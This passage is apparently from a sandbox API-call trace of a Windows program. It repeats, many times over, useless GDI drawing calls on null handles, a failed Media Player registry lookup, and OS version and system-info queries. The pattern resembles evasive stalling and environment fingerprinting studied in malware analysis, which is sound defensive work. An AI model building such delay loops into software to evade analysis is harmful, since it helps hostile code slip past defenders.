lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.863] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.863] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.863] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.863] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.864] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.864] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x40401cd [0087.864] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x20401d0 [0087.864] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cf6 [0087.864] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cf7 [0087.864] CombineRgn (hrgnDst=0x1040cf6, hrgnSrc1=0x40401cd, hrgnSrc2=0x20401d0, iMode=1) returned 1 [0087.864] CombineRgn (hrgnDst=0x1040cf7, hrgnSrc1=0x40401cd, hrgnSrc2=0x20401d0, iMode=4) returned 2 [0087.864] CreateSolidBrush (color=0xff) returned 0x2100cf5 [0087.864] CreateSolidBrush (color=0xff0000) returned 0x1100cf8 [0087.864] DeleteObject (ho=0x1100cf8) returned 1 [0087.864] DeleteObject (ho=0x20401d0) returned 1 [0087.864] DeleteObject (ho=0x40401cd) returned 1 [0087.864] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.864] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.864] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.864] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.864] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.864] BeginPath (hdc=0x0) returned 0 [0087.864] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.864] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.864] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.864] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.864] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.864] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.864] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.864] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.864] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x30401d0 [0087.864] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x50401cd [0087.864] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cf9 [0087.864] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cfa [0087.864] CombineRgn (hrgnDst=0x1040cf9, hrgnSrc1=0x30401d0, hrgnSrc2=0x50401cd, iMode=1) returned 1 [0087.864] CombineRgn (hrgnDst=0x1040cfa, hrgnSrc1=0x30401d0, hrgnSrc2=0x50401cd, iMode=4) returned 2 [0087.864] CreateSolidBrush (color=0xff) returned 0x2100cf8 [0087.864] CreateSolidBrush (color=0xff0000) returned 0x1100cfb [0087.865] DeleteObject (ho=0x1100cfb) returned 1 [0087.865] DeleteObject (ho=0x50401cd) returned 1 [0087.865] DeleteObject (ho=0x30401d0) returned 1 [0087.865] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.865] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.865] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.865] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.865] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.865] BeginPath (hdc=0x0) returned 0 [0087.865] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.865] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.865] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.865] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.865] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.865] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.865] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.865] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.865] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x60401cd [0087.865] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x40401d0 [0087.865] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cfc [0087.865] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cfd [0087.865] CombineRgn (hrgnDst=0x1040cfc, hrgnSrc1=0x60401cd, hrgnSrc2=0x40401d0, iMode=1) returned 1 [0087.865] CombineRgn (hrgnDst=0x1040cfd, hrgnSrc1=0x60401cd, hrgnSrc2=0x40401d0, iMode=4) returned 2 [0087.865] CreateSolidBrush (color=0xff) returned 0x2100cfb [0087.865] CreateSolidBrush (color=0xff0000) returned 0x1100cfe [0087.865] DeleteObject (ho=0x1100cfe) returned 1 [0087.865] DeleteObject (ho=0x40401d0) returned 1 [0087.865] DeleteObject (ho=0x60401cd) returned 1 [0087.865] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.865] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.865] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.865] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.865] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.865] BeginPath (hdc=0x0) returned 0 [0087.865] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.865] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.865] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.865] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.865] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.866] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.866] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.866] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.866] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x50401d0 [0087.866] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x70401cd [0087.866] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040cff [0087.866] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d00 [0087.866] CombineRgn (hrgnDst=0x1040cff, hrgnSrc1=0x50401d0, hrgnSrc2=0x70401cd, iMode=1) returned 1 [0087.866] CombineRgn (hrgnDst=0x1040d00, hrgnSrc1=0x50401d0, hrgnSrc2=0x70401cd, iMode=4) returned 2 [0087.866] CreateSolidBrush (color=0xff) returned 0x2100cfe [0087.866] CreateSolidBrush (color=0xff0000) returned 0x1100d01 [0087.866] DeleteObject (ho=0x1100d01) returned 1 [0087.866] DeleteObject (ho=0x70401cd) returned 1 [0087.866] DeleteObject (ho=0x50401d0) returned 1 [0087.866] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.866] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.866] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.866] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.866] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.866] BeginPath (hdc=0x0) returned 0 [0087.866] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.866] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.866] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.866] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.866] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.866] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.866] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.866] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.866] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x80401cd [0087.866] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x60401d0 [0087.866] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d02 [0087.866] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d03 [0087.867] CombineRgn (hrgnDst=0x1040d02, hrgnSrc1=0x80401cd, hrgnSrc2=0x60401d0, iMode=1) returned 1 [0087.867] CombineRgn (hrgnDst=0x1040d03, hrgnSrc1=0x80401cd, hrgnSrc2=0x60401d0, iMode=4) returned 2 [0087.867] CreateSolidBrush (color=0xff) returned 0x2100d01 [0087.867] CreateSolidBrush (color=0xff0000) returned 0x1100d04 [0087.867] DeleteObject (ho=0x1100d04) returned 1 [0087.867] DeleteObject (ho=0x60401d0) returned 1 [0087.867] DeleteObject (ho=0x80401cd) returned 1 [0087.867] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.867] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.867] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.867] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.867] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.867] BeginPath (hdc=0x0) returned 0 [0087.867] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.867] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.867] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.867] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.867] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.867] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.867] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.867] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.867] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x70401d0 [0087.867] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x90401cd [0087.867] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d05 [0087.867] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d06 [0087.867] CombineRgn (hrgnDst=0x1040d05, hrgnSrc1=0x70401d0, hrgnSrc2=0x90401cd, iMode=1) returned 1 [0087.867] CombineRgn (hrgnDst=0x1040d06, hrgnSrc1=0x70401d0, hrgnSrc2=0x90401cd, iMode=4) returned 2 [0087.867] CreateSolidBrush (color=0xff) returned 0x2100d04 [0087.867] CreateSolidBrush (color=0xff0000) returned 0x1100d07 [0087.867] DeleteObject (ho=0x1100d07) returned 1 [0087.867] DeleteObject (ho=0x90401cd) returned 1 [0087.867] DeleteObject (ho=0x70401d0) returned 1 [0087.867] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.867] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.867] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.867] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.868] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.868] BeginPath (hdc=0x0) returned 0 [0087.868] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.868] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.868] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.868] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.868] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.868] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.868] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.868] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.868] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa0401cd [0087.868] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x80401d0 [0087.868] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d08 [0087.868] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d09 [0087.868] CombineRgn (hrgnDst=0x1040d08, hrgnSrc1=0xa0401cd, hrgnSrc2=0x80401d0, iMode=1) returned 1 [0087.868] CombineRgn (hrgnDst=0x1040d09, hrgnSrc1=0xa0401cd, hrgnSrc2=0x80401d0, iMode=4) returned 2 [0087.868] CreateSolidBrush (color=0xff) returned 0x2100d07 [0087.868] CreateSolidBrush (color=0xff0000) returned 0x1100d0a [0087.868] DeleteObject (ho=0x1100d0a) returned 1 [0087.868] DeleteObject (ho=0x80401d0) returned 1 [0087.868] DeleteObject (ho=0xa0401cd) returned 1 [0087.868] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.868] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.868] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.868] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.868] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.868] BeginPath (hdc=0x0) returned 0 [0087.868] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.868] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.868] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.868] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.868] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.868] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.868] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.868] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.869] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x90401d0 [0087.869] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb0401cd [0087.869] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d0b [0087.869] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d0c [0087.869] CombineRgn (hrgnDst=0x1040d0b, hrgnSrc1=0x90401d0, hrgnSrc2=0xb0401cd, iMode=1) returned 1 [0087.869] CombineRgn (hrgnDst=0x1040d0c, hrgnSrc1=0x90401d0, hrgnSrc2=0xb0401cd, iMode=4) returned 2 [0087.869] CreateSolidBrush (color=0xff) returned 0x2100d0a [0087.869] CreateSolidBrush (color=0xff0000) returned 0x1100d0d [0087.869] DeleteObject (ho=0x1100d0d) returned 1 [0087.869] DeleteObject (ho=0xb0401cd) returned 1 [0087.869] DeleteObject (ho=0x90401d0) returned 1 [0087.869] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.869] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.869] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.869] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.869] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.869] BeginPath (hdc=0x0) returned 0 [0087.869] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.869] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.869] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.869] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.869] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.869] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.869] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.869] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.869] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc0401cd [0087.869] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa0401d0 [0087.869] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d0e [0087.869] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d0f [0087.869] CombineRgn (hrgnDst=0x1040d0e, hrgnSrc1=0xc0401cd, hrgnSrc2=0xa0401d0, iMode=1) returned 1 [0087.869] CombineRgn (hrgnDst=0x1040d0f, hrgnSrc1=0xc0401cd, hrgnSrc2=0xa0401d0, iMode=4) returned 2 [0087.869] CreateSolidBrush (color=0xff) returned 0x2100d0d [0087.869] CreateSolidBrush (color=0xff0000) returned 0x1100d10 [0087.869] DeleteObject (ho=0x1100d10) returned 1 [0087.869] DeleteObject (ho=0xa0401d0) returned 1 [0087.869] DeleteObject (ho=0xc0401cd) returned 1 [0087.869] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.869] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.870] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.870] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.870] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.870] BeginPath (hdc=0x0) returned 0 [0087.870] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.870] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.870] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.870] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.870] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.870] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.870] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.870] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.870] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb0401d0 [0087.870] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd0401cd [0087.870] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d11 [0087.870] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040d12 [0087.870] CombineRgn (hrgnDst=0x1040d11, 